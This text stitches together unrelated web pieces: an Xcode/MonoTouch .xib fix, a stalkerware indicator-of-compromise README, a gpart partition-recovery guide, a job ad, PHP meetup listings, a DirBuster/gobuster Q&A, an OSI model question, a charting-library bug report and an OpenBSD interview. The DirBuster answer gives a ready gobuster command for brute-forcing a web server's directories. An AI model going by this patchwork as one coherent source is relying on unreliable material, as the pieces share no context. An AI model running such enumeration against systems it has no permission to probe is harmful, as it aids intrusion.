Lost .h file association in XCode due to empty IBClassDescriber element in .xib NOTE: Perhaps this question could be answered by a pure Objective-C expert as well? I work primarily in MonoTouch, but I think this problem may not be MonoTouch-specific. Typically when the Assistant Editor in XCode won't show my .h file, I just close everything, delete my obj directory, and rebuild all. I wait for the Indexing process to complete. But this time I really can't get the .h file to show up, and thus I'm unable to add any new outlets to my FooViewController. So far, I've tracked it down to an empty IBClassDescriber element in my FooViewController.xib <object class="IBClassDescriber" key="IBDocument.Classes"/> which should look something more like: <object class="IBClassDescriber" key="IBDocument.Classes"> <array class="NSMutableArray" key="referencedPartialClassDescriptions"> <object class="IBPartialClassDescription"> <string key="className">FooViewController</string> <string key="superclassName">UIViewController</string> <dictionary class="NSMutableDictionary" key="outlets"> ... </dictionary> <dictionary class="NSMutableDictionary" key="toOneOutletInfosByName"> ... </dictionary> <object class="IBClassDescriptionSource" key="sourceIdentifier"> <string key="majorKey">IBProjectSource</string> <string key="minorKey">./Classes/FooViewController.h</string> </object> </object> </array> </object> which has the link to the .h file in the minorKey of IBClassDescriptionSource. I've tried cleaning my project, closing all my apps and deleting the obj and bin directories. I've tried renaming the file (along with the above). And other various sporadic cursing and deleting/reverting/and banging things loudly. To no avail. Anyone know how to recover the IBClassDescriber element once it's been emptied? I'm going to have a look back through the file history and see when it disappeared. Maybe that'll give me a clue. Thanks! CM Halfway there... 
I'm able to recreate the scenario where IBClassDescriptionSource gets set to empty. Details to come when I figure this out. But, quickly: if you create FooViewController, then change the Register("FooViewController") in the .designer file (perhaps from renaming), when you save the file in XCode, the IBClassDescriber entry will be emptied. So this scenario came about (as it has for other people) when I had renamed my ViewController file and failed to update all references to the old name. There are several places the name of the view controller needs to change, but there are really only 2 critical places that need to match to get XCode and MonoDevelop in sync. For this example, assume I had a view controller named FooViewController and had renamed it to BarViewController. First, every time you launch XCode (XC), MonoDevelop (MD) creates a temporary directory named obj/XCode/# where # starts at 0 and increments by one every time you re-launch XC. The number resets to 0 every time you restart MD. Every time you close XC and return to MD, the directory will be deleted. NOTE: the directory will NOT be deleted if you are browsing it from Finder or Terminal, etc. MD creates the required .h and .m files in that directory that XC expects to see. The names of these files are based on the value of the Register attribute in YourViewController.designer.cs. In my case, I had properly updated the .designer file to: [Register ("BarViewController")] Now when I open the .xib I get the dreaded No Assistant Results error. At this point, my .xib file, when opened in the Source Code Editor of MD, showed a full IBClassDescriber section (though improperly referencing ./Classes/FooViewController.h since I hadn't updated it yet). What I did next was to save the .xib from XC.
Since XC could not find ./Classes/FooViewController.h (MD was now generating BarViewController.h), it deleted the IBClassDescriber section from the .xib, giving me an empty element <object class="IBClassDescriber" key="IBDocument.Classes"/> Because I had failed to update the .xib properly, I had now lost this entire section (which had numerous references that I didn't want to lose or know how to recreate). The key to fixing this was noticing that the -1.CustomClassName property in the .xib was set incorrectly. Updating it to match the Register setting <dictionary class="NSMutableDictionary" key="flattenedProperties"> <string key="-1.CustomClassName">BarViewController</string> ... </dictionary> and re-saving the file resulted in XC recreating the entire IBClassDescriber section with proper references to the .h file <object class="IBClassDescriber" key="IBDocument.Classes"> <array class="NSMutableArray" key="referencedPartialClassDescriptions"> <object class="IBPartialClassDescription"> <string key="className">BarViewController</string> <string key="superclassName">UIViewController</string> <object class="NSMutableDictionary" key="outlets"> ... </object> <object class="NSMutableDictionary" key="toOneOutletInfosByName"> ... </object> <object class="IBClassDescriptionSource" key="sourceIdentifier"> <string key="majorKey">IBProjectSource</string> <string key="minorKey">./Classes/BarViewController.h</string> </object> </object> </array> </object> So in summary, when you're renaming files, the places to change are: Refactor/Rename your main ViewController class (e.g. FooViewController.cs to BarViewController.cs).
Using Refactor (right click class file -> refactor -> rename) will update lots of stuff for you, including the .designer file and any references to the class throughout your code. Change the string value passed to the superclass in your ViewController constructor public BarViewController () : base ("BarViewController", null) which is required for loading the class at runtime. Open your .designer file and change the Register call so that the link between XC and MD is maintained: [Register ("BarViewController")] partial class BarViewController Rename the .xib: BarViewController.xib Open BarViewController.xib in MD with the source editor (right click -> open with -> Source Code Editor) and change the -1.CustomClassName key: <string key="-1.CustomClassName">BarViewController</string> Save the .xib from MD. Open BarViewController.xib in XC. (If you've got it open in MD, you'll need to right click -> Open With -> XCode.) Wait for indexing to complete, then open the Assistant Editor. Notice that BarViewController.h is (correctly) opened. Save the .xib from XC. Open the .xib in MD and notice that the IBClassDescriber section is fully specified, even if it was empty to start with. Ship it! Hope this helps someone, clears up some of the mystery of the linkage between XC and MD, or at least reminds me what to do next time I run into this problem. Cheers, CM Note: I will accept this as the answer when SO allows me (in 2 days).
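The two critical names can also be checked mechanically. This is an illustrative Python sketch (the file contents are trimmed stand-ins, not a full .xib or .designer.cs) that verifies the -1.CustomClassName value in the .xib matches the Register attribute in the .designer file:

```python
import re
import xml.etree.ElementTree as ET

# Trimmed stand-ins for the two files; the real ones hold far more.
xib = """<data>
  <dictionary class="NSMutableDictionary" key="flattenedProperties">
    <string key="-1.CustomClassName">BarViewController</string>
  </dictionary>
</data>"""
designer = '[Register ("BarViewController")] partial class BarViewController'

# The class name Xcode will look for when the .xib is saved.
custom = ET.fromstring(xib).find('.//string[@key="-1.CustomClassName"]').text
# The class name MonoDevelop uses when generating the .h/.m files.
registered = re.search(r'Register\s*\("([^"]+)"\)', designer).group(1)

# If these disagree, saving from Xcode empties the IBClassDescriber section.
print("in sync" if custom == registered else "MISMATCH")
```

Running a check like this before saving from XC would catch the rename mistake before the IBClassDescriber section gets wiped.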
STACK_EXCHANGE
Android Stalkerware: indicators of compromise (README)

This repository collects indicators of compromise for stalkerware applications on Android. Files:

- appid.yaml : package IDs
- androguard rules.yar : Androguard Yara rules (to be used in Koodous)
- certificates.yaml
- sha256.csv

Note that Android 5.0 and above has "Google Play Protect", a service that runs on your phone and monitors it for potential threats. This service will interfere with the installation of stalkerware and will therefore be disabled by whoever is loading this software onto your phone.

Over 58,000 Android users had stalkerware installed on their phones last year, researchers from Kaspersky Lab have revealed. Of these, more than 35,000 had no idea stalkerware was present on their devices until they installed Kaspersky's mobile antivirus, which flagged the infection. Kaspersky plans to show a special alert on Android devices when it finds stalkerware-like apps; its findings confirm a growing trend.

Unfortunately, stalkerware is not just an Android issue. Any device that can have custom software run on it can theoretically suffer a stalkerware infection. Employees' PCs can have it installed to check on how they use their work time, for instance. FlexiSpy is a good example of this: it was sold to jealous lovers who wanted to monitor their partners.
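The appid.yaml indicator file lists known stalkerware package IDs. As a minimal sketch (with hypothetical package names standing in for the real indicator list), the packages installed on a device, as reported by `adb shell pm list packages`, can be checked against that list:

```python
# Hypothetical package IDs standing in for entries from the repo's
# appid.yaml indicator file (the real list is much longer).
STALKERWARE_IDS = {
    "com.example.spyapp",
    "com.example.tracker",
}

# `adb shell pm list packages` prints one "package:<id>" line per app.
pm_output = """package:com.android.chrome
package:com.example.spyapp
package:com.android.settings"""

installed = {line.split(":", 1)[1] for line in pm_output.splitlines() if line}
hits = sorted(installed & STALKERWARE_IDS)
for pkg in hits:
    print("possible stalkerware:", pkg)
```

A package-ID match is only one signal; the Yara rules and certificate/hash indicators in the repository cover apps that repackage themselves under new IDs.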
OPCFW_CODE
If you have ever made a typo when deleting or restoring the MBR, you probably also have trashed your partition table. Use gpart, included on the Knoppix disc, to restore lost partition tables. OK, so you had a little too much fun with the previous hack, ignored the warnings, accidentally typed 512 when you should have typed 446, and now your partition table is gone. Or maybe you accidentally ran fdisk on the wrong drive. No problem. Just restore from the backup you made before you started. You did back up your MBR, right? Don't worry; it happens to the best of us. The last time I trashed my partition table, I was trying to update grub on my laptop using dd. Like an idiot, I followed the instructions to create a grub boot floppy and applied them to install grub on my laptop's hard drive. Overwriting the first 512 bytes of a floppy with the grub boot sector is fine; overwriting the first 512 bytes of my hard drive is not. I was unable to boot and had no partition table. For many people, this might have been the time to reinstall, but I knew the files and partitions were there; I just couldn't get to them. If only I had a tool to figure out where the partitions began and ended, I could then recreate my partition table and everything would be back to normal. Lucky for me, there is such a tool: gpart (short for "guess partition"). Gpart scans a hard drive for signs of a partition's start by comparing a list of filesystem-recognition modules it has with the sectors it is scanning, and then creates a partition table based on these guesses. Doubly lucky for me, gpart comes included with Knoppix, so I was able to restore my laptop's MBR without having to take apart the laptop and hook the drive to a desktop machine. I ran gpart, checked over its guesses, which matched my drive, and voila! My partitions were back. Gpart is an incredibly useful tool, and I am grateful for it; however, it does have its limitations.
Gpart works best when you are restoring a partition table of primary partitions. In the case of extended partitions, gpart tries its best to recover the partition information, but there is less of a chance of recovery. To recover your partition table, run gpart and tell it to scan your drive: knoppix@ttyp0[knoppix]$ sudo gpart /dev/hda By default, gpart only scans the drive and outputs results; it does not actually write to the drive or overwrite your MBR. This is important because gpart may not correctly guess all of your partitions, so you should check its guesses before you actually write them to disk. Gpart scans through the hard drive and outputs possible partition tables as it finds them. When it is finished scanning the drive, gpart outputs a complete list of partition tables it has found. Read through this list of partitions and make sure that it reflects the partitions you have created on the disk. It might be that gpart can recover only some of the partitions on the drive. Once you have reviewed the partitions that gpart has guessed, run gpart again but with the -W option to write the guessed partition table to the disk: knoppix@ttyp0[knoppix]$ sudo gpart -W /dev/hda /dev/hda This isn't a typo; you do actually put /dev/hda twice in the command. You can potentially tell gpart to write the partition table to a second drive, based on what it detected on the first drive. Once the partition table has been written, reboot and attempt to access the drives again. If you get errors when mounting the drives, check the partitioning within Knoppix with a tool like fdisk, cfdisk, or qtparted to see whether gpart has incorrectly guessed where your partition ends. I've had to modify a partition that gpart ended 4 MB too early, but afterwards, the filesystem mounted correctly, and I was able to access all of my files. It is scary to be in a position where you must think about partition-table recovery.
At least with Knoppix and gpart, it's possible to recover the partition table without completely reinstalling the operating system.
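The backup step mentioned at the start deserves a concrete illustration, including the 446-vs-512 distinction that caused the trouble. This sketch runs against a scratch image file rather than a real disk, so it is safe to try; substitute your actual device (e.g. /dev/hda) only once you are certain of the target:

```shell
# Work on a scratch image file, not a real disk. Create a fake 1 MiB drive:
dd if=/dev/zero of=disk.img bs=1024 count=1024 status=none
# Back up the full MBR: 446 bytes of boot code + 64-byte partition table
# + 2-byte signature = 512 bytes.
dd if=disk.img of=mbr-backup.img bs=512 count=1 status=none
# Restore only the boot code (446 bytes), leaving the partition table
# currently on the "disk" untouched:
dd if=mbr-backup.img of=disk.img bs=446 count=1 conv=notrunc status=none
wc -c mbr-backup.img
```

Restoring all 512 bytes would also overwrite the partition table with the backed-up copy, which is exactly what you want after trashing it, and exactly what you don't want if the table has legitimately changed since the backup.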
OPCFW_CODE
Bloomberg Second Measure is a leading provider of data analytics that delivers valuable insights into company performance and consumer behavior. Using data from billions of anonymized transactions, we have built a self-service analytics product for daily tracking and real-time exploration of 5,200+ public and private companies. Clients use our product to discover new markets, gain an advantage in financial investments, and inform their competitive strategies. To experiment, develop, and produce the accurate, high-quality data we deliver to our clients, our team relies on distributed data storage and processing systems. We're looking for Software Engineers to architect and develop these systems to (1) reliably store and manage data; (2) capture metadata about our data and the processing of it; and (3) evolve how our engineers and data scientists query our data.

We'll trust you to:
- Design, build, and manage mission-critical systems for accessing and managing data within our platform, including data discovery, monitoring, metadata (lineage, history, schema), and query layers
- Build and maintain libraries and integrations for data processing systems to leverage discovery, monitoring, metadata, and access functionality
- Collaborate with data scientists, engineers, and product managers to understand the emergent workloads and needs to support the product
- Analyze, understand, and solve performance and scalability problems

You'll need to have:
- Experience designing, building, and supporting production systems in Java and Python
- Familiarity with different database technologies, such as distributed query engines (Presto/Trino), analytics data stores (ClickHouse, Apache Druid), and scalable key-value stores (Cassandra, Redis), with an understanding of their internal design and implementation
- Familiarity with the data processing ecosystem, such as Apache Spark, Apache Flink, and Dask
- Familiarity with the data governance and metadata ecosystem, such as Apache Atlas, DataHub, Marquez, Metacat, Hive Metastore
- Experience building APIs, especially Thrift and gRPC
- Experience working with structured (Parquet, Avro, ORC, Protocol Buffers) and unstructured data (CSV, JSON)
- Strong fundamentals in distributed systems design and development
- Experience in building and operating extensible, scalable, and resilient systems
- A self-starter with the ability to work effectively on a team, with excellent spoken and written communication
- BA, BS, MS, or PhD in Computer Science, Engineering, or a related technology field

We'd love to see:
- Experience working with Kubernetes to deploy and serve mission-critical systems and services
- Experience evolving, operating, and supporting either distributed query engines (e.g., Presto/Trino), analytics data systems (e.g., ClickHouse or Apache Druid), or scalable key-value stores (Cassandra, FoundationDB, Redis, DynamoDB)
- Familiarity with using and running production systems within AWS

If this sounds like you: Apply if you think we're a good match. We'll get in touch to let you know what the next steps are. Bloomberg is an equal opportunities employer, and we value diversity at our company. We do not discriminate on the basis of race, religion, color, national origin, gender, sexual orientation, age, marital status, veteran status, or disability status.
OPCFW_CODE
- Coding Horrors - A Horror Film Fan's Guide to PHP Coding Nightmares For June's meetup, we have Mark Baker (https://twitter.com/Mark_Baker) with his talk "Coding Horrors - A Horror Film Fan's Guide to PHP Coding Nightmares". Abstract: Most of us are probably aware of code smells, code that doesn't apply SOLID principles, code that should be refactored to make the system easier to maintain. But there are other coding horrors that should trigger alarm bells whenever we see them. Like a good horror movie, coding horrors should scare us when we find them, because they're often symptomatic of deeper problems. So let's take a short tour of some of the greatest horror movies ever made; and some of the most worrying code horrors that I've seen. - Dr Sheldon Cooper Presents: Fun with Flags For April's meetup, we have Michael Heap (https://twitter.com/mheap) back with us with his talk "Dr Sheldon Cooper Presents: Fun with Flags". Abstract: No no, not country flags, feature flags! Feature flags are a powerful technique that allows teams to modify a system’s behaviour without changing code. They can be used for several reasons – canary releases and A/B testing to name a few. This talk will show you how you’re already using feature flags in your application without realising it. Next, we’ll take a look at some of the best tooling out there to help you take feature flags to the next level. Finally, we’ll cover strategies for removing feature flags before they become technical debt that you have to manage. - Crafting Quality PHP Applications For March's meetup, we have James Titcumb (https://twitter.com/asgrim) with us with his talk "Crafting Quality PHP Applications". Abstract: This prototype works, but it’s not pretty, and now it’s in production. That legacy application really needs some TLC. Where do we start? When creating long-lived applications, it’s imperative to focus on good practices.
The solution is to improve the whole development life cycle; from planning, better coding and testing, to automation, peer review and more. In this talk, we’ll take a quick look into each of these areas, looking at how we can make positive, actionable change in our workflow. - Christmas Social Every year we always end up organising this too late, at which point people already have plans, but there can be no excuses this year with us getting it out there early! The Christmas social is a nice opportunity for us all to sit down and have some good food and drinks and get into the festive spirit! We'll update this with more details in the coming weeks. - Get GOing with a new language For October's meetup, we have Kat Zien (https://twitter.com/kasiazien) with us with her talk "Get GOing with a new language". Abstract: Learning more than one programming language is key to becoming a better developer. It is like adding a new tool to your toolbox. The more tools you have, the easier and quicker you’ll be able to tackle whatever job you need to do. You’ll also be able to use the right tool for the job, and who doesn’t like that?! I picked up Go (golang) over a year ago as it was becoming more popular among developers. Coming from a PHP background, I had no idea what channels or goroutines were, or how concurrency differed from parallelism. I’ve got to say, it was a whole new world. Very different, but very cool. I was hooked! By happy coincidence, my company was looking to rewrite a legacy PHP app in Go. It was over 2000 lines of procedural and messy PHP4 with more downtime than I’m willing to admit to. I took on this project, and soon enough we had a much faster, more maintainable and much more reliable app for our customers. Go gave us options we would not have in PHP. The goal of this talk is to give you a good idea of what Go is and how it compares with PHP. We’ll look at the language itself as well as the tooling and communities around it.
Even if you’re not sold on Go by the end of it, I hope you’ll leave inspired to go out there and learn whatever language you wanted to look into next. - Teaching the next generation... For September's meetup, we have Michael Woodward with us speaking about teaching the next generation. Abstract: The next generation of developers are looking for learning resources. Universities are not able to provide the platform required to everyone; it comes at a high cost... Current free resources are lagging behind new improvements in the language. Here's how we're filling that gap: PHP School, a completely Open Source learning platform for "students" to push themselves, at their own pace, driven not by deadlines but by topics of interest. Teach the skills that are required, show off your project with a tutorial workshop! The possibilities are endless, let's help shape the next generation. - PHP School Workshop With a difference to our usual schedule, rather than holding a July meetup on the last Thursday of the month, we'll be welcoming the PHP School team, Michael Woodward and Aydin Hassan, to PHP Warwickshire on Thursday 10th August to run a workshop! What is PHP School? A dedicated community-based learning platform that will teach you the core skills in PHP. The concept behind PHP School is small standalone workshops; workshops are run from the command line, somewhere every developer should be familiar with. Each workshop covers a different topic, some beginner, some advanced. You're not restricted to a schedule; you go at your own pace with no pressure. Who is the Workshop for? Everyone! It doesn't matter if you have never touched PHP or if you are an expert. You may want to take part in the workshop or come along to learn more about how to contribute to PHP School itself! How to Prepare for the Workshop... In order to take part in the workshop and work along with us you'll have to bring a laptop or group up with others who bring a laptop.
We are happy for you to form your own groups, although if you want to take part but do not have a laptop or a group, don't worry: we will address this at the start of the meetup. If you are planning to bring a laptop, it would be ideal to install PHP School beforehand by following the steps here: https://phpschool.io/#installation If you do not have PHP installed natively or just prefer this option, Docker can also be used: https://github.com/php-school/docker-phpschool Again, installation beforehand is ideal, but do not worry if you can't do this; we'll help you at the start of the meetup. - Is what you've coded what you mean? For June's talk, we have Dave Liddament (https://twitter.com/daveliddament) with us talking about "Is what you've coded what you mean?" Abstract: Imagine a Venn diagram of your last software project with three parts: what the code should do, what the code actually does, and what the developers think the code does. The greater the overlap between all three, the more successful and bug-free your software is likely to be. This talk examines how to increase this overlap, specifically how to reduce the gap between what the code actually does and what the developer thinks the code does. We'll look at the importance of type hinting, assertions, and things called value objects. We'll then look at how these techniques can be combined with modern IDEs to: reduce the chance of introducing bugs; minimise the cost associated with any bugs that do slip through the net; and safely refactor code so we can rename classes, methods and variables to be more explicit. By the end of the talk you'll have picked up tips on how to write cleaner software with fewer bugs that does what it's supposed to do. Bio: Dave is a Director and developer at Lamp Bristol, a software consultancy. Today he codes in PHP and uses the Symfony framework. In the past he's written software commercially in many languages including C, Python, and Java as well as PHP.
Dave is keen to pass on his knowledge. He helps organise PHP-SW (https://phpsw.uk/), where he occasionally speaks, and also runs a monthly workshop (https://www.meetup.com/Bristol-PHP-Training/) that offers introductions to topics like testing, setting up a CI environment, and git. When not busy coding, Dave enjoys scuba diving and running. - Round Table Discussion This month we do not have a talk but will instead be holding round table discussions. These types of events are often very productive and also give everyone more of a chance to get involved and get to know each other. If you have any topics you'd like to discuss or hear other opinions about, feel free to let us know online or on the night! - Kickass Development Environments with Docker For April's meetup, we have David McKay (https://twitter.com/rawkode) with us doing his talk "Kickass Development Environments with Docker". Abstract: Docker, the hottest technology around at the moment. It took the Ops world by storm in 2014, became mainstream in 2015, and dominated the developer world in 2016. Docker is a tool that allows you to package your application up into a single runnable, distributable binary, akin to the phar, but in Hulk mode. Docker allows you, a developer, to specify the exact environment your application needs to run, across development, test, staging, and production. In this talk I will cover the creation of this utopian distributable and show you how you can compose your entire production infrastructure locally with only a small YAML file and without installing a single thing. Let's say hello to Docker.
Fuzzing a webserver using DirBuster So I've been attempting to use DirBuster to fuzz a few vulnerable machines. I haven't been satisfied with the output, so I started trying some manual fuzzing and then referencing the default DirBuster wordlist as well as others to make sure it wasn't a singular issue. For example, when fuzzing using the default DirBuster medium-size wordlist, 5 results appear. I know I can manually get 200 & 403 responses from pages like /config, /admin, or /mail, but they are not appearing in my DirBuster results even though they exist in the wordlist I'm using. I get an output like /error, /icons, /mailman, /pipermail, /cgi-bin, and nothing else, even though I verified the other pages exist in the wordlist and test correctly by hand. Does anyone out there have an idea of what mistake I'm making that is getting such a weird output? I can only recommend using other software. My favorite at the moment is dirb. That's a good idea; I've been messing with it and rerunning scans in the background hoping I could figure out what I was doing wrong. And now that I think about it, it could be because I didn't launch DirBuster with sudo privileges. @Hadoken why would DirBuster need to be run as root? @AndrolGenhald I'm inexperienced with the software and thought maybe it could be an issue with how the software was making requests. However, I do believe it's an issue with its configuration; I'm just blind and not knowledgeable enough to understand my mistakes. @Hadoken Your first instinct upon software not working should not be "Let's try it as root!" At the very least make sure that it actually needs such privileges. I'm with @maggick: try dirb and see if you get any different output. Or the one mentioned below, gobuster.
Not only are the command line tools faster (from memory the DirBuster GUI app is awfully slow), but you will also get some data to reinforce the so-called 'weird output', or some different data which may allow you to draw other conclusions and solve the problem you're having. I love the OWASP project and community (I'm actually part of it), but I don't like DirBuster, which is an OWASP project, at all. It's very slow compared to other similar tools, and it easily crashes if you try to load a big wordlist. "Does anyone out there have an idea of what mistake I'm making that is getting such a weird output?" You may not be making any mistakes; from my experience about 1-2 years ago, DirBuster seemed a fairly unreliable tool, especially when using middle/large-sized lists, so it may simply be malfunctioning. I strongly recommend gobuster. It's a command line tool, fairly flexible, and super fast. Most pentesters I know choose gobuster over any other similar free tools. You could start with a command like the following one, explore the different options, and tune it according to your specific needs: gobuster -u http://A.B.C.D/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -s 200,204,301,302,307,403,500 -e If you don't have one already, I recommend you get a Kali Linux VM so you can have lots of tools (including gobuster, dirb, and DirBuster) to play around with. Kali also comes with many good wordlists such as the one referenced in the command above. Although this might be good advice, it doesn't answer the original question. @forest Fair enough. For the question "Does anyone out there have an idea of what mistake I'm making that is getting such a weird output?", I'll answer: you may not be making any mistakes; from my experience DirBuster is a fairly unreliable tool (especially when you use middle/large-sized lists), so it may simply be malfunctioning.
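For intuition, what dirb and gobuster do under the hood is nothing magical: iterate a wordlist, request each candidate path, and report interesting status codes. A minimal stdlib-only sketch (the target URL, wordlist, and helper names here are illustrative, not taken from any of those tools):

```python
# Minimal sketch of wordlist-based content discovery: build candidate URLs
# from a wordlist and probe each one, keeping "interesting" status codes.
from urllib.parse import urljoin
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

INTERESTING = {200, 204, 301, 302, 307, 403, 500}

def candidate_urls(base, words):
    """Build the list of URLs to probe from an iterable of wordlist entries."""
    out = []
    for word in words:
        word = word.strip().strip("/")
        if word:
            out.append(urljoin(base, word + "/"))
    return out

def probe(url, timeout=5):
    """Return the HTTP status for one URL, or None on a connection error."""
    try:
        return urlopen(Request(url, method="HEAD"), timeout=timeout).status
    except HTTPError as e:
        return e.code  # 403, 404, etc. still carry a status code
    except URLError:
        return None

# Usage against a real target (not run here):
#   for url in candidate_urls("http://A.B.C.D/", open("wordlist.txt")):
#       status = probe(url)
#       if status in INTERESTING:
#           print(status, url)
```

Note that no root privileges are needed for any of this: it is all plain outbound HTTP, which is why running DirBuster with sudo should make no difference.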
Does the PDU always go through all 7 layers in the OSI model? Every explanation of the OSI model (or other models) gives me the impression that the data (PDU) from the top layer (Application Layer, L7) always goes through all of the layers down to the bottom layer (Physical Layer, L1). Does the PDU always go through all 7 layers in the OSI model? Or can we choose down to which layer we want to apply our communication protocol? These examples might explain my confusion. Let's say I have IPsec (Network Layer, L3) hardware on an FPGA. IPsec provides many security services already. Does that mean I bypass the Data Link Layer? Another example is when we are communicating via SSL. Does that mean I bypass all the layers after it except the Physical Layer? The OSI model is a way of conceptualizing networking. It is not a specification to which code has been written or the Internet has actually been designed. Don't take it too literally. As @MichaelHampton points out, take the ideas of abstraction and encapsulation from the OSI or IP models, but don't believe that is exactly what happens in the real world. OSes do not implement separate layers 5 to 7. Some applications may implement separate layers 5 to 7, e.g. web browsers, but most do not. The IP model is closer to reality, but there are many exceptions to it. No layer gets bypassed. Here is a good visualization from https://www.webopedia.com/quick_ref/OSI_Layers.asp: So, let's say I have two FPGAs communicating via IPsec. Do I bypass the Data Link Layer and go directly to the Physical Layer? Of course we always use the Physical Layer. It is a conceptual model; nothing is bypassed. In reality everything is physical, right? Capture some actual packets on a physical interface with some VPN traffic and dissect the capture with Wireshark. You will see encapsulation: the data contents of the lower layer containing the necessary upper layers.
So, you might have Ethernet, containing IP/UDP, containing an encapsulation header, containing IP/TCP, containing data. The Ethernet frame is still required to traverse the physical link. The outer IP/UDP at layer 3 routes to the VPN endpoint; this might go through routers of the underlay network. The inner IP/TCP at layer 3 belongs to the tunnelled network; the unwrapped packet is routed to its destination. That's just enough layers to get the job done. Note how the VPN routes without caring about the higher layers of the application. It does not matter that the data happens to be the HTTPS protocol, with its own added features like TLS encryption. It could just as easily be the archaic Daytime Protocol, very simple and probably just one packet.
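The encapsulation described above is, mechanically, just nested byte strings: each layer prepends its own header to the payload handed down from the layer above. A toy illustration (the header contents are made-up labels, not real Ethernet/IP/UDP wire formats):

```python
# Toy illustration of encapsulation: each layer wraps the payload from
# the layer above with its own header. Headers here are fake labels,
# not real protocol formats.
def wrap(header: bytes, payload: bytes) -> bytes:
    return header + payload

app_data  = b"daytime: Sun Apr 15 09:18:08 2018"
tcp_seg   = wrap(b"[TCP]", app_data)    # layer 4 of the tunnelled network
inner_ip  = wrap(b"[IP2]", tcp_seg)     # layer 3, the tunnelled network
vpn_encap = wrap(b"[ESP]", inner_ip)    # VPN encapsulation header
outer_udp = wrap(b"[UDP]", vpn_encap)   # layer 4 of the underlay
outer_ip  = wrap(b"[IP1]", outer_udp)   # layer 3, routes to the VPN endpoint
frame     = wrap(b"[ETH]", outer_ip)    # layer 2, always needed on the wire

# Peeling the frame apart shows the same nesting Wireshark would display.
assert frame.startswith(b"[ETH][IP1][UDP][ESP][IP2][TCP]")
assert frame.endswith(app_data)
```

Nothing is "bypassed" here: the VPN simply never inspects anything inside its payload, which is why the inner data could be HTTPS or the Daytime Protocol with no difference to the tunnel.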
Fixed numpy value error on string Hi, this is an awesome library, thanks for sharing! I hit an issue when trying to run example 2:

import pandas as pd
from time import sleep
from lightweight_charts import Chart

if __name__ == '__main__':
    chart = Chart()

    df1 = pd.read_csv('ohlcv.csv')
    df2 = pd.read_csv('next_ohlcv.csv')

    chart.set(df1)
    chart.show()

    last_close = df1.iloc[-1]

    for i, series in df2.iterrows():
        chart.update(series)

        if series['close'] > 20 and last_close < 20:
            chart.marker(text='The price crossed $20!')

        last_close = series['close']
        sleep(0.1)

The error appears when chart.update(series) is called in the above example, inside the method _single_datetime_format. I think pd.api.types.is_datetime64_any_dtype is expecting an array-like data type but doesn't like strings (which I thought it would handle). Anyways, this was my workaround. Are you able to repro this? Or am I the only one hitting this issue? Here is my environment: altair==5.1.1 attrs==23.1.0 blinker==1.6.2 bottle==0.12.25 cachetools==5.3.1 certifi==2023.7.22 cffi==1.15.1 charset-normalizer==3.2.0 click==8.1.7 clr-loader==0.2.6 colorama==0.4.6 gitdb==4.0.10 GitPython==3.1.33 idna==3.4 importlib-metadata==6.8.0 Jinja2==3.1.2 jsonschema==4.19.0 jsonschema-specifications==2023.7.1 lightweight-charts==<IP_ADDRESS> markdown-it-py==3.0.0 MarkupSafe==2.1.3 mdurl==0.1.2 numpy==1.25.2 packaging==23.1 pandas==2.1.0 Pillow==9.5.0 protobuf==4.24.2 proxy-tools==0.1.0 pyarrow==13.0.0 pycparser==2.21 pydeck==0.8.0 Pygments==2.16.1 Pympler==1.0.1 python-dateutil==2.8.2 pythonnet==3.0.2 pytz==2023.3 pytz-deprecation-shim==0.1.0.post0 pywebview==4.3.2 referencing==0.30.2 requests==2.31.0 rich==13.5.2 rpds-py==0.10.0 six==1.16.0 smmap==5.0.0 streamlit==1.26.0 tenacity==8.2.3 toml==0.10.2 toolz==0.12.0 tornado==6.3.3 typing_extensions==4.7.1 tzdata==2023.3 tzlocal==4.3.1 urllib3==2.0.4 validators==0.21.2 watchdog==3.0.0 zipp==3.16.2 Which I got by doing pip install lightweight-charts pip install streamlit
Seems to be an issue with the new version of pandas; I can't seem to figure out what is causing it, but the implementation you provided will work. Thanks! Louis
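The workaround described above boils down to a type guard: a scalar coming out of df.iterrows() may be a plain string rather than a datetime64 value, so check the value's type before treating it as a datetime. A hypothetical, stdlib-only sketch of that guard (the function name is illustrative, not the library's actual code):

```python
# Hypothetical sketch of the guard the workaround amounts to: a scalar
# time value may be a plain string, so branch on its type instead of
# relying on a dtype check. Names are illustrative, not library code.
from datetime import datetime

def normalize_time(value):
    """Return a datetime for either a datetime or an ISO-format string."""
    if isinstance(value, datetime):
        return value
    if isinstance(value, str):
        return datetime.fromisoformat(value)
    raise TypeError(f"unsupported time value: {value!r}")

assert normalize_time("2023-09-01 10:30:00") == datetime(2023, 9, 1, 10, 30)
assert normalize_time(datetime(2023, 9, 1)) == datetime(2023, 9, 1)
```

In the real library the string branch would presumably defer to pandas parsing; the point is only that pd.api.types.is_datetime64_any_dtype is a dtype check for array-likes, not a parser for scalar strings.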
On October 18, 20 years ago, the first commit landed in the OpenBSD CVS repository. Today, on the 20th anniversary, the beastie.pl team invites all readers to a series of interviews conducted by our team with project developers. We start off with Bryan Steele, who was the first. 1. For the readers who don't know you, can you shortly introduce yourself? I'm Bryan Steele (brynet@), I post silly stuff under the twitter account @canadianbryan and mostly just waste time on irc & reddit. 2. Why did you choose to run OpenBSD? How long have you been using it? I chose OpenBSD after running a few different Unixen. I originally was a DOS/Win user like many kids born in the 80's and raised in the 90's. I discovered QNX at school on the Unisys/Burroughs ICON computers, but all I remember is playing adventure games and LOGO. For a while I played with Unix on my 486 and later P1 & AMD K6 computers at home, first getting a copy of Coherent UNIX and then eventually Slackware Linux when I finally had Internet access. I somehow landed on OpenBSD around 3.7 and have been using it ever since. 3. For those readers that still haven't joined the OpenBSD community, why should they try OpenBSD? It's a good community to be a part of, even if you're not comfortable taking an active role at first .. there's a lot of smart people working on cool things, and just watching and using it can teach you a lot. My first time using OpenBSD was to set up an IRC server so I could extend a friend's network to Canada. I switched over systems one by one and over the years found it well suited for a wide variety of different roles, be it a flexible router/server or desktop. 4. Is OpenBSD your daily driver at home & at work? Yes.
